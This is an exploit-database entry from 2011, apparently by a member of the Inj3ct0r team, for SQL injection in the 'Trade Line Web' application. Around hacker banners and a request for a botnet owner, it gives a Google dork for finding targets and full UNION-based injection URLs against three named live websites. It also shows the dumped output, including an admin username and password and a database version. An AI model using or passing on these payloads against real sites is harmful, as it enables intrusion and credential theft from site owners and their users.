Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities



EKU-ID: 282 CVE: OSVDB-ID:
Author: knockout Published: 2011-05-20 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com
My inj3ct0r Brothers.:)
r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n
--------------------------------------------------------
Note:' i Need botnet Owner friend! '
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
---------------------------------------------------------
                 Example| Exploitation
                
                
                 SQL Injecting..
                 Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
                 Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan

                    Hm... ok.
                   
                 SQL Injecting..
                 Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
                 Mysql Writes: 1:admin:12345
                  
                    Hmm... ok.
                 
                 SQL Injecting..
                 Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
                 Mysql Writes : 5.0.90

    ================================================================

                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/
                                     Was Here.                HTTP://H4X0RESEC.BLOGSOT.COM